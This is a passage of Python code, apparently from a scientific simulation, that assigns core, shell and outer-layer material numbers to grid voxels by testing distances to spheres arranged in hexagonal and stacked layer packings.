if ( cc >= (((radiuscore)/(radiuscore+(radiusc-radiuscore)))**2) and (cc) <= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2)):
A[a][b]=shellnumber
if ( cc >= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2) and cc <= 1.0):
A[a][b]=cnum
div=float(radiusc)/float(dl)
cc=float(((xx8/(div))**2+(yy8/(div))**2+(zz8/(div))**2) )
if ( ((cc))<= (((radiuscore)/(radiuscore+(radiusc-radiuscore)) ))**2) :
A[a][b]=corenumber
if ( cc >= (((radiuscore)/(radiuscore+(radiusc-radiuscore)))**2) and (cc) <= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2)):
A[a][b]=shellnumber
if ( cc >= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2) and cc <= 1.0):
A[a][b]=cnum
div=float(radiusc)/float(dl)
cc=float(((xx9/(div))**2+(yy9/(div))**2+(zz9/(div))**2) )
if ( ((cc))<= (((radiuscore)/(radiuscore+(radiusc-radiuscore)) ))**2) :
A[a][b]=corenumber
if ( cc >= (((radiuscore)/(radiuscore+(radiusc-radiuscore)))**2) and (cc) <= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2)):
A[a][b]=shellnumber
if ( cc >= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2) and cc <= 1.0):
A[a][b]=cnum
div=float(radiusc)/float(dl)
cc=float(((xx10/(div))**2+(yy10/(div))**2+(zz10/(div))**2) )
if ( ((cc))<= (((radiuscore)/(radiuscore+(radiusc-radiuscore)) ))**2) :
A[a][b]=corenumber
if ( cc >= (((radiuscore)/(radiuscore+(radiusc-radiuscore)))**2) and (cc) <= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2)):
A[a][b]=shellnumber
if ( cc >= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2) and cc <= 1.0):
A[a][b]=cnum
div=float(radiusc)/float(dl)
cc=float(((xx11/(div))**2+(yy11/(div))**2+(zz11/(div))**2) )
if ( ((cc))<= (((radiuscore)/(radiuscore+(radiusc-radiuscore)) ))**2) :
A[a][b]=corenumber
if ( cc >= (((radiuscore)/(radiuscore+(radiusc-radiuscore)))**2) and (cc) <= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2)):
A[a][b]=shellnumber
if ( cc >= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2) and cc <= 1.0):
A[a][b]=cnum
div=float(radiusc)/float(dl)
cc=float(((xx12/(div))**2+(yy12/(div))**2+(zz12/(div))**2) )
if ( ((cc))<= (((radiuscore)/(radiuscore+(radiusc-radiuscore)) ))**2) :
A[a][b]=corenumber
if ( cc >= (((radiuscore)/(radiuscore+(radiusc-radiuscore)))**2) and (cc) <= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2)):
A[a][b]=shellnumber
if ( cc >= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2) and cc <= 1.0):
A[a][b]=cnum
return A
###########################################################################################################################
###########################################################################################################################
def hex4 (xini,xfin,yini,yfin,zini,zfin,Npix,Npiy,Ntam,Dx1,Dy1,Dz1,radiusc,radiuscore,radiusshell,A,corenumber,shellnumber,cnum,dl,x,y,z,shape,base,width,height,base2,width2,radiusx1,radiusy1,radiusz1,radiusx2,radiusy2,radiusz2,radiusxcs,radiusycs,radiuszcs):
for k in range(zini,zfin+1):
for j in range(yini,yfin+1):
for i in range(xini,xfin+1):
a=int(i)
b=int(j+(k-1)*Dy1)
xx1= float(((3.0)*float(radiusc/dl)-float(i)+1))
yy1= float(((3.0)*float(radiusc/dl)-float(j)+1))
zz1= float((float(radiusc/dl)-float(k)+1))
xx2= float(((3.0-1.0)*float(radiusc/dl)-float(i)+1))
yy2= float(((3.0-sqrt(3.0))*float(radiusc/dl)-float(j)+1))
zz2= float((float(radiusc/dl)-float(k)+1))
xx3= float(((3.0+1.0)*float(radiusc/dl)-float(i)+1))
yy3= float(((3.0-sqrt(3.0))*float(radiusc/dl)-float(j)+1))
zz3= float((float(radiusc/dl)-float(k)+1))
xx4= float(((3.0-1.0)*float(radiusc/dl)-float(i)+1))
yy4= float(((3.0+sqrt(3.0))*float(radiusc/dl)-float(j)+1))
zz4= float((float(radiusc/dl)-float(k)+1))
xx5=float(((3.0+1.0)*float(radiusc/dl)-float(i)+1))
yy5= float(((3.0+sqrt(3.0))*float(radiusc/dl)-float(j)+1))
zz5= float((float(radiusc/dl)-float(k)+1))
xx6= float((1.0*float(radiusc/dl)-float(i)+1))
yy6= float((3.0*float(radiusc/dl)-float(j)+1))
zz6= float((float(radiusc/dl)-float(k)+1))
xx7= float((5.0*float(radiusc/dl)-float(i)+1))
yy7= float((3.0*float(radiusc/dl)-float(j)+1))
zz7= float((1.0*float(radiusc/dl)-float(k)+1))
# print(xx1,xx2,xx3,xx4,xx5,xx6,xx7)
# second layer
xx8= float(((3.0)*float(radiusc/dl)-float(i)+1))
yy8= float(((3.0)*float(radiusc/dl)-float(j)+1))
zz8= float((3.0*float(radiusc/dl)-float(k)+1))
xx9= float(((3.0-1.0)*float(radiusc/dl)-float(i)+1))
yy9= float(((3.0-sqrt(3.0))*float(radiusc/dl)-float(j)+1))
zz9= float((3.0*float(radiusc/dl)-float(k)+1))
xx10=float(((3.0+1.0)*float(radiusc/dl)-float(i)+1))
yy10= float(((3.0-sqrt(3.0))*float(radiusc/dl)-float(j)+1))
zz10= float((3.0*float(radiusc/dl)-float(k)+1))
xx11= float(((3.0-1.0)*float(radiusc/dl)-float(i)+1))
yy11= float(((3.0+sqrt(3.0))*float(radiusc/dl)-float(j)+1))
zz11= float((3.0*float(radiusc/dl)-float(k)+1))
xx12= float(((3.0+1.0)*float(radiusc/dl)-float(i)+1))
yy12= float(((3.0+sqrt(3.0))*float(radiusc/dl)-float(j)+1))
zz12= float((3.0*float(radiusc/dl)-float(k)+1))
xx13= float((1.0*float(radiusc/dl)-float(i)+1))
yy13= float((3.0*float(radiusc/dl)-float(j)+1))
zz13= float((3.0*float(radiusc/dl)-float(k)+1))
xx14=float((5.0*float(radiusc/dl)-float(i)+1))
yy14= float((3.0*float(radiusc/dl)-float(j)+1))
zz14= float((3.0*float(radiusc/dl)-float(k)+1))
# third layer
xx15=float(((3.0)*float(radiusc/dl)-float(i)+1))
yy15= float(((3.0)*float(radiusc/dl)-float(j)+1))
zz15= float((5.0*float(radiusc/dl)-float(k)+1))
xx16= float(((3.0-1.0)*float(radiusc/dl)-float(i)+1))
yy16= float(((3.0-sqrt(3.0))*float(radiusc/dl)-float(j)+1))
zz16= float((5.0*float(radiusc/dl)-float(k)+1))
xx17= float(((3.0+1.0)*float(radiusc/dl)-float(i)+1))
yy17= float(((3.0-sqrt(3.0))*float(radiusc/dl)-float(j)+1))
zz17=float((5.0*float(radiusc/dl)-float(k)+1))
xx18= float(((3.0-1.0)*float(radiusc/dl)-float(i)+1))
yy18= float(((3.0+sqrt(3.0))*float(radiusc/dl)-float(j)+1))
zz18= float((5.0*float(radiusc/dl)-float(k)+1))
xx19= float(((3.0+1.0)*float(radiusc/dl)-float(i)+1))
yy19= float(((3.0+sqrt(3.0))*float(radiusc/dl)-float(j)+1))
zz19=float((5.0*float(radiusc/dl)-float(k)+1))
xx20= float((1.0*float(radiusc/dl)-float(i)+1))
yy20= float((3.0*float(radiusc/dl)-float(j)+1))
zz20= float((5.0*float(radiusc/dl)-float(k)+1))
xx21= float((5.0*float(radiusc/dl)-float(i)+1))
yy21= float((3.0*float(radiusc/dl)-float(j)+1))
zz21= float((5.0*float(radiusc/dl)-float(k)+1))
div=float(radiusc)/float(dl)
cc=float(((xx1/(div))**2+(yy1/(div))**2+(zz1/(div))**2) )
# print radiuscore,radiusshell,radiusc
if ( ((cc))<= (((radiuscore)/(radiuscore+(radiusc-radiuscore)) ))**2) :
A[a][b]=corenumber
if ( cc >= (((radiuscore)/(radiuscore+(radiusc-radiuscore)))**2) and (cc) <= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2)):
A[a][b]=shellnumber
if ( cc >= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2) and cc <= 1.0):
A[a][b]=cnum
div=float(radiusc)/float(dl)
cc=float(((xx2/(div))**2+(yy2/(div))**2+(zz2/(div))**2) )
if ( ((cc))<= (((radiuscore)/(radiuscore+(radiusc-radiuscore)) ))**2) :
A[a][b]=corenumber
if ( cc >= (((radiuscore)/(radiuscore+(radiusc-radiuscore)))**2) and (cc) <= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2)):
A[a][b]=shellnumber
if ( cc >= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2) and cc <= 1.0):
A[a][b]=cnum
div=float(radiusc)/float(dl)
cc=float(((xx3/(div))**2+(yy3/(div))**2+(zz3/(div))**2) )
if ( ((cc))<= (((radiuscore)/(radiuscore+(radiusc-radiuscore)) ))**2) :
A[a][b]=corenumber
if ( cc >= (((radiuscore)/(radiuscore+(radiusc-radiuscore)))**2) and (cc) <= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2)):
A[a][b]=shellnumber
if ( cc >= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2) and cc <= 1.0):
A[a][b]=cnum
div=float(radiusc)/float(dl)
cc=float(((xx4/(div))**2+(yy4/(div))**2+(zz4/(div))**2) )
if ( ((cc))<= (((radiuscore)/(radiuscore+(radiusc-radiuscore)) ))**2) :
A[a][b]=corenumber
if ( cc >= (((radiuscore)/(radiuscore+(radiusc-radiuscore)))**2) and (cc) <= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2)):
A[a][b]=shellnumber
if ( cc >= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2) and cc <= 1.0):
A[a][b]=cnum
div=float(radiusc)/float(dl)
cc=float(((xx5/(div))**2+(yy5/(div))**2+(zz5/(div))**2) )
if ( ((cc))<= (((radiuscore)/(radiuscore+(radiusc-radiuscore)) ))**2) :
A[a][b]=corenumber
if ( cc >= (((radiuscore)/(radiuscore+(radiusc-radiuscore)))**2) and (cc) <= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2)):
A[a][b]=shellnumber
if ( cc >= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2) and cc <= 1.0):
A[a][b]=cnum
div=float(radiusc)/float(dl)
cc=float(((xx6/(div))**2+(yy6/(div))**2+(zz6/(div))**2) )
if ( ((cc))<= (((radiuscore)/(radiuscore+(radiusc-radiuscore)) ))**2) :
A[a][b]=corenumber
if ( cc >= (((radiuscore)/(radiuscore+(radiusc-radiuscore)))**2) and (cc) <= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2)):
A[a][b]=shellnumber
if ( cc >= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2) and cc <= 1.0):
A[a][b]=cnum
div=float(radiusc)/float(dl)
cc=float(((xx7/(div))**2+(yy7/(div))**2+(zz7/(div))**2) )
if ( ((cc))<= (((radiuscore)/(radiuscore+(radiusc-radiuscore)) ))**2) :
A[a][b]=corenumber
if ( cc >= (((radiuscore)/(radiuscore+(radiusc-radiuscore)))**2) and (cc) <= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2)):
A[a][b]=shellnumber
if ( cc >= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2) and cc <= 1.0):
A[a][b]=cnum
div=float(radiusc)/float(dl)
cc=float(((xx8/(div))**2+(yy8/(div))**2+(zz8/(div))**2) )
if ( ((cc))<= (((radiuscore)/(radiuscore+(radiusc-radiuscore)) ))**2) :
A[a][b]=corenumber
if ( cc >= (((radiuscore)/(radiuscore+(radiusc-radiuscore)))**2) and (cc) <= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2)):
A[a][b]=shellnumber
if ( cc >= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2) and cc <= 1.0):
A[a][b]=cnum
div=float(radiusc)/float(dl)
cc=float(((xx9/(div))**2+(yy9/(div))**2+(zz9/(div))**2) )
if ( ((cc))<= (((radiuscore)/(radiuscore+(radiusc-radiuscore)) ))**2) :
A[a][b]=corenumber
if ( cc >= (((radiuscore)/(radiuscore+(radiusc-radiuscore)))**2) and (cc) <= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2)):
A[a][b]=shellnumber
if ( cc >= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2) and cc <= 1.0):
A[a][b]=cnum
div=float(radiusc)/float(dl)
cc=float(((xx10/(div))**2+(yy10/(div))**2+(zz10/(div))**2) )
if ( ((cc))<= (((radiuscore)/(radiuscore+(radiusc-radiuscore)) ))**2) :
A[a][b]=corenumber
if ( cc >= (((radiuscore)/(radiuscore+(radiusc-radiuscore)))**2) and (cc) <= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2)):
A[a][b]=shellnumber
if ( cc >= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2) and cc <= 1.0):
A[a][b]=cnum
div=float(radiusc)/float(dl)
cc=float(((xx11/(div))**2+(yy11/(div))**2+(zz11/(div))**2) )
if ( ((cc))<= (((radiuscore)/(radiuscore+(radiusc-radiuscore)) ))**2) :
A[a][b]=corenumber
if ( cc >= (((radiuscore)/(radiuscore+(radiusc-radiuscore)))**2) and (cc) <= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2)):
A[a][b]=shellnumber
if ( cc >= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2) and cc <= 1.0):
A[a][b]=cnum
div=float(radiusc)/float(dl)
cc=float(((xx12/(div))**2+(yy12/(div))**2+(zz12/(div))**2) )
if ( ((cc))<= (((radiuscore)/(radiuscore+(radiusc-radiuscore)) ))**2) :
A[a][b]=corenumber
if ( cc >= (((radiuscore)/(radiuscore+(radiusc-radiuscore)))**2) and (cc) <= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2)):
A[a][b]=shellnumber
if ( cc >= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2) and cc <= 1.0):
A[a][b]=cnum
div=float(radiusc)/float(dl)
cc=float(((xx13/(div))**2+(yy13/(div))**2+(zz13/(div))**2) )
if ( ((cc))<= (((radiuscore)/(radiuscore+(radiusc-radiuscore)) ))**2) :
A[a][b]=corenumber
if ( cc >= (((radiuscore)/(radiuscore+(radiusc-radiuscore)))**2) and (cc) <= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2)):
A[a][b]=shellnumber
if ( cc >= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2) and cc <= 1.0):
A[a][b]=cnum
div=float(radiusc)/float(dl)
cc=float(((xx14/(div))**2+(yy14/(div))**2+(zz14/(div))**2) )
if ( ((cc))<= (((radiuscore)/(radiuscore+(radiusc-radiuscore)) ))**2) :
A[a][b]=corenumber
if ( cc >= (((radiuscore)/(radiuscore+(radiusc-radiuscore)))**2) and (cc) <= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2)):
A[a][b]=shellnumber
if ( cc >= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2) and cc <= 1.0):
A[a][b]=cnum
div=float(radiusc)/float(dl)
cc=float(((xx15/(div))**2+(yy15/(div))**2+(zz15/(div))**2) )
if ( ((cc))<= (((radiuscore)/(radiuscore+(radiusc-radiuscore)) ))**2) :
A[a][b]=corenumber
if ( cc >= (((radiuscore)/(radiuscore+(radiusc-radiuscore)))**2) and (cc) <= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2)):
A[a][b]=shellnumber
if ( cc >= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2) and cc <= 1.0):
A[a][b]=cnum
div=float(radiusc)/float(dl)
cc=float(((xx16/(div))**2+(yy16/(div))**2+(zz16/(div))**2) )
if ( ((cc))<= (((radiuscore)/(radiuscore+(radiusc-radiuscore)) ))**2) :
A[a][b]=corenumber
if ( cc >= (((radiuscore)/(radiuscore+(radiusc-radiuscore)))**2) and (cc) <= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2)):
A[a][b]=shellnumber
if ( cc >= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2) and cc <= 1.0):
A[a][b]=cnum
div=float(radiusc)/float(dl)
cc=float(((xx17/(div))**2+(yy17/(div))**2+(zz17/(div))**2) )
if ( ((cc))<= (((radiuscore)/(radiuscore+(radiusc-radiuscore)) ))**2) :
A[a][b]=corenumber
if ( cc >= (((radiuscore)/(radiuscore+(radiusc-radiuscore)))**2) and (cc) <= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2)):
A[a][b]=shellnumber
if ( cc >= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2) and cc <= 1.0):
A[a][b]=cnum
div=float(radiusc)/float(dl)
cc=float(((xx18/(div))**2+(yy18/(div))**2+(zz18/(div))**2) )
if ( ((cc))<= (((radiuscore)/(radiuscore+(radiusc-radiuscore)) ))**2) :
A[a][b]=corenumber
if ( cc >= (((radiuscore)/(radiuscore+(radiusc-radiuscore)))**2) and (cc) <= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2)):
A[a][b]=shellnumber
if ( cc >= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2) and cc <= 1.0):
A[a][b]=cnum
div=float(radiusc)/float(dl)
cc=float(((xx19/(div))**2+(yy19/(div))**2+(zz19/(div))**2) )
if ( ((cc))<= (((radiuscore)/(radiuscore+(radiusc-radiuscore)) ))**2) :
A[a][b]=corenumber
if ( cc >= (((radiuscore)/(radiuscore+(radiusc-radiuscore)))**2) and (cc) <= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2)):
A[a][b]=shellnumber
if ( cc >= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2) and cc <= 1.0):
A[a][b]=cnum
div=float(radiusc)/float(dl)
cc=float(((xx20/(div))**2+(yy20/(div))**2+(zz20/(div))**2) )
if ( ((cc))<= (((radiuscore)/(radiuscore+(radiusc-radiuscore)) ))**2) :
A[a][b]=corenumber
if ( cc >= (((radiuscore)/(radiuscore+(radiusc-radiuscore)))**2) and (cc) <= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2)):
A[a][b]=shellnumber
if ( cc >= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2) and cc <= 1.0):
A[a][b]=cnum
div=float(radiusc)/float(dl)
cc=float(((xx21/(div))**2+(yy21/(div))**2+(zz21/(div))**2) )
if ( ((cc))<= (((radiuscore)/(radiuscore+(radiusc-radiuscore)) ))**2) :
A[a][b]=corenumber
if ( cc >= (((radiuscore)/(radiuscore+(radiusc-radiuscore)))**2) and (cc) <= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2)):
A[a][b]=shellnumber
if ( cc >= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2) and cc <= 1.0):
A[a][b]=cnum
return A
###########################################################################################################################
###########################################################################################################################
def hex5 (xini,xfin,yini,yfin,zini,zfin,Npix,Npiy,Ntam,Dx1,Dy1,Dz1,radiusc,radiuscore,radiusshell,A,corenumber,shellnumber,cnum,dl,x,y,z,shape,base,width,height,base2,width2,radiusx1,radiusy1,radiusz1,radiusx2,radiusy2,radiusz2,radiusxcs,radiusycs,radiuszcs):
for k in range(zini,zfin+1):
for j in range(yini,yfin+1):
for i in range(xini,xfin+1):
a=int(i)
b=int(j+(k-1)*Dy1)
xx1=float(((3.0)*float(radiusc/dl)-float(i)+1))
yy1= float(((3.0)*float(radiusc/dl)-float(j)+1))
zz1=float((float(radiusc/dl)-k+1))
xx2=((3-1.0)*radiusc/dl-i+1)
yy2= ((3-sqrt(3.0))*radiusc/dl-j+1)
zz2=(radiusc/dl-k+1)
xx3=((3+1.0)*radiusc/dl-i+1)
yy3= ((3-sqrt(3.0))*radiusc/dl-j+1)
zz3=(radiusc/dl-k+1)
xx4=((3-1.0)*radiusc/dl-i+1)
yy4= ((3+sqrt(3.0))*radiusc/dl-j+1)
zz4=(radiusc/dl-k+1)
xx5=((3+1.0)*radiusc/dl-i+1)
yy5= ((3+sqrt(3.0))*radiusc/dl-j+1)
zz5=(radiusc/dl-k+1)
xx6=(1*radiusc/dl-i+1)
yy6= (3*radiusc/dl-j+1)
zz6=(radiusc/dl-k+1)
xx7=(5*radiusc/dl-i+1)
yy7= (3*radiusc/dl-j+1)
zz7=(1*radiusc/dl-k+1)
# second layer
xx8=((3)*radiusc/dl-i+1)
yy8= ((3)*radiusc/dl-j+1)
zz8=(3*radiusc/dl-k+1)
xx9=((3-1.0)*radiusc/dl-i+1)
yy9= ((3-sqrt(3.0))*radiusc/dl-j+1)
zz9=(3*radiusc/dl-k+1)
xx10=((3+1.0)*radiusc/dl-i+1)
yy10= ((3-sqrt(3.0))*radiusc/dl-j+1)
zz10=(3*radiusc/dl-k+1)
xx11=float(((3-1.0)*radiusc/dl-i+1))
yy11= float(((3+sqrt(3.0))*radiusc/dl-j+1))
zz11=float((3*radiusc/dl-k+1))
xx12=((3+1.0)*radiusc/dl-i+1)
yy12= ((3+sqrt(3.0))*radiusc/dl-j+1)
zz12=(3*radiusc/dl-k+1)
xx13=(1*radiusc/dl-i+1)
yy13= (3*radiusc/dl-j+1)
zz13=(3*radiusc/dl-k+1)
xx14=(5*radiusc/dl-i+1)
yy14= (3*radiusc/dl-j+1)
zz14=(3*radiusc/dl-k+1)
# third layer
xx15=((3-1)*radiusc/dl-i+1)
yy15= ((3)*radiusc/dl-j+1)
zz15=((3+sqrt(3.0))*radiusc/dl-k+1)
xx16=((3+1)*radiusc/dl-i+1)
yy16= ((3)*radiusc/dl-j+1)
zz16=((3+sqrt(3.0))*radiusc/dl-k+1)
xx17=((3)*radiusc/dl-i+1)
yy17= ((3-1-sqrt(2.0)/2)*radiusc/dl-j+1)
zz17=((3+sqrt(3.0))*radiusc/dl-k+1)
xx18=((3)*radiusc/dl-i+1)
yy18= ((3+1+sqrt(2.0)/2)*radiusc/dl-j+1)
zz18=((3+1*sqrt(3.0))*radiusc/dl-k+1)
# fourth layer
xx19=((3)*radiusc/dl-i+1)
yy19= ((3-sqrt(3.0)/2)*radiusc/dl-j+1)
zz19=((3+2*sqrt(3.0))*radiusc/dl-k+1)
xx20=((3)*radiusc/dl-i+1)
yy20= ((3+sqrt(3.0)/2)*radiusc/dl-j+1)
zz20=((3+2*sqrt(3.0))*radiusc/dl-k+1)
# fifth layer
xx21=((3)*radiusc/dl-i+1)
yy21= ((3)*radiusc/dl-j+1)
zz21=((4+3*sqrt(3.0))*radiusc/dl-k+1)
div=float(radiusc)/float(dl)
cc=float(((xx1/(div))**2+(yy1/(div))**2+(zz1/(div))**2) )
# print (xx11,yy11,zz11,3+sqrt(3.0),float(radiusc/dl))
# print radiuscore,radiusshell,radiusc
if ( ((cc))<= (((radiuscore)/(radiuscore+(radiusc-radiuscore)) ))**2) :
A[a][b]=corenumber
if ( cc >= (((radiuscore)/(radiuscore+(radiusc-radiuscore)))**2) and (cc) <= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2)):
A[a][b]=shellnumber
if ( cc >= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2) and cc <= 1.0):
A[a][b]=cnum
div=float(radiusc)/float(dl)
cc=float(((xx2/(div))**2+(yy2/(div))**2+(zz2/(div))**2) )
if ( ((cc))<= (((radiuscore)/(radiuscore+(radiusc-radiuscore)) ))**2) :
A[a][b]=corenumber
if ( cc >= (((radiuscore)/(radiuscore+(radiusc-radiuscore)))**2) and (cc) <= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2)):
A[a][b]=shellnumber
if ( cc >= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2) and cc <= 1.0):
A[a][b]=cnum
div=float(radiusc)/float(dl)
cc=float(((xx3/(div))**2+(yy3/(div))**2+(zz3/(div))**2) )
if ( ((cc))<= (((radiuscore)/(radiuscore+(radiusc-radiuscore)) ))**2) :
A[a][b]=corenumber
if ( cc >= (((radiuscore)/(radiuscore+(radiusc-radiuscore)))**2) and (cc) <= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2)):
A[a][b]=shellnumber
if ( cc >= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2) and cc <= 1.0):
A[a][b]=cnum
div=float(radiusc)/float(dl)
cc=float(((xx4/(div))**2+(yy4/(div))**2+(zz4/(div))**2) )
if ( ((cc))<= (((radiuscore)/(radiuscore+(radiusc-radiuscore)) ))**2) :
A[a][b]=corenumber
if ( cc >= (((radiuscore)/(radiuscore+(radiusc-radiuscore)))**2) and (cc) <= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2)):
A[a][b]=shellnumber
if ( cc >= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2) and cc <= 1.0):
A[a][b]=cnum
div=float(radiusc)/float(dl)
cc=float(((xx5/(div))**2+(yy5/(div))**2+(zz5/(div))**2) )
if ( ((cc))<= (((radiuscore)/(radiuscore+(radiusc-radiuscore)) ))**2) :
A[a][b]=corenumber
if ( cc >= (((radiuscore)/(radiuscore+(radiusc-radiuscore)))**2) and (cc) <= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2)):
A[a][b]=shellnumber
if ( cc >= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2) and cc <= 1.0):
A[a][b]=cnum
div=float(radiusc)/float(dl)
cc=float(((xx6/(div))**2+(yy6/(div))**2+(zz6/(div))**2) )
if ( ((cc))<= (((radiuscore)/(radiuscore+(radiusc-radiuscore)) ))**2) :
A[a][b]=corenumber
if ( cc >= (((radiuscore)/(radiuscore+(radiusc-radiuscore)))**2) and (cc) <= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2)):
A[a][b]=shellnumber
if ( cc >= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2) and cc <= 1.0):
A[a][b]=cnum
div=float(radiusc)/float(dl)
cc=float(((xx7/(div))**2+(yy7/(div))**2+(zz7/(div))**2) )
if ( ((cc))<= (((radiuscore)/(radiuscore+(radiusc-radiuscore)) ))**2) :
A[a][b]=corenumber
if ( cc >= (((radiuscore)/(radiuscore+(radiusc-radiuscore)))**2) and (cc) <= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2)):
A[a][b]=shellnumber
if ( cc >= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2) and cc <= 1.0):
A[a][b]=cnum
div=float(radiusc)/float(dl)
cc=float(((xx8/(div))**2+(yy8/(div))**2+(zz8/(div))**2) )
if ( ((cc))<= (((radiuscore)/(radiuscore+(radiusc-radiuscore)) ))**2) :
A[a][b]=corenumber
if ( cc >= (((radiuscore)/(radiuscore+(radiusc-radiuscore)))**2) and (cc) <= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2)):
A[a][b]=shellnumber
if ( cc >= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2) and cc <= 1.0):
A[a][b]=cnum
div=float(radiusc)/float(dl)
cc=float(((xx9/(div))**2+(yy9/(div))**2+(zz9/(div))**2) )
if ( ((cc))<= (((radiuscore)/(radiuscore+(radiusc-radiuscore)) ))**2) :
A[a][b]=corenumber
if ( cc >= (((radiuscore)/(radiuscore+(radiusc-radiuscore)))**2) and (cc) <= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2)):
A[a][b]=shellnumber
if ( cc >= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2) and cc <= 1.0):
A[a][b]=cnum
div=float(radiusc)/float(dl)
cc=float(((xx10/(div))**2+(yy10/(div))**2+(zz10/(div))**2) )
if ( ((cc))<= (((radiuscore)/(radiuscore+(radiusc-radiuscore)) ))**2) :
A[a][b]=corenumber
if ( cc >= (((radiuscore)/(radiuscore+(radiusc-radiuscore)))**2) and (cc) <= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2)):
A[a][b]=shellnumber
if ( cc >= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2) and cc <= 1.0):
A[a][b]=cnum
div=float(radiusc)/float(dl)
cc=float(((xx11/(div))**2+(yy11/(div))**2+(zz11/(div))**2) )
if ( ((cc))<= (((radiuscore)/(radiuscore+(radiusc-radiuscore)) ))**2) :
A[a][b]=corenumber
# print('aqui')
if ( cc >= (((radiuscore)/(radiuscore+(radiusc-radiuscore)))**2) and (cc) <= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2)):
A[a][b]=shellnumber
if ( cc >= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2) and cc <= 1.0):
A[a][b]=cnum
div=float(radiusc)/float(dl)
cc=float(((xx12/(div))**2+(yy12/(div))**2+(zz12/(div))**2) )
if ( ((cc))<= (((radiuscore)/(radiuscore+(radiusc-radiuscore)) ))**2) :
A[a][b]=corenumber
if ( cc >= (((radiuscore)/(radiuscore+(radiusc-radiuscore)))**2) and (cc) <= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2)):
A[a][b]=shellnumber
if ( cc >= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2) and cc <= 1.0):
A[a][b]=cnum
div=float(radiusc)/float(dl)
cc=float(((xx13/(div))**2+(yy13/(div))**2+(zz13/(div))**2) )
if ( ((cc))<= (((radiuscore)/(radiuscore+(radiusc-radiuscore)) ))**2) :
A[a][b]=corenumber
if ( cc >= (((radiuscore)/(radiuscore+(radiusc-radiuscore)))**2) and (cc) <= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2)):
A[a][b]=shellnumber
if ( cc >= (((radiusshell)/(radiuscore+(radiusc-radiuscore)))**2) and cc <= 1.0):
A[a][b]=cnum
div=float(radiusc)/float(dl)
cc=float(((xx14/(div))**2+(yy14/(div))**2+(zz14/(div))**2) )
if ( ((cc))<= (((radiuscore)/(radiuscore+(radiusc-radiuscore)) ))**2) :
A[a][b]=corenumber
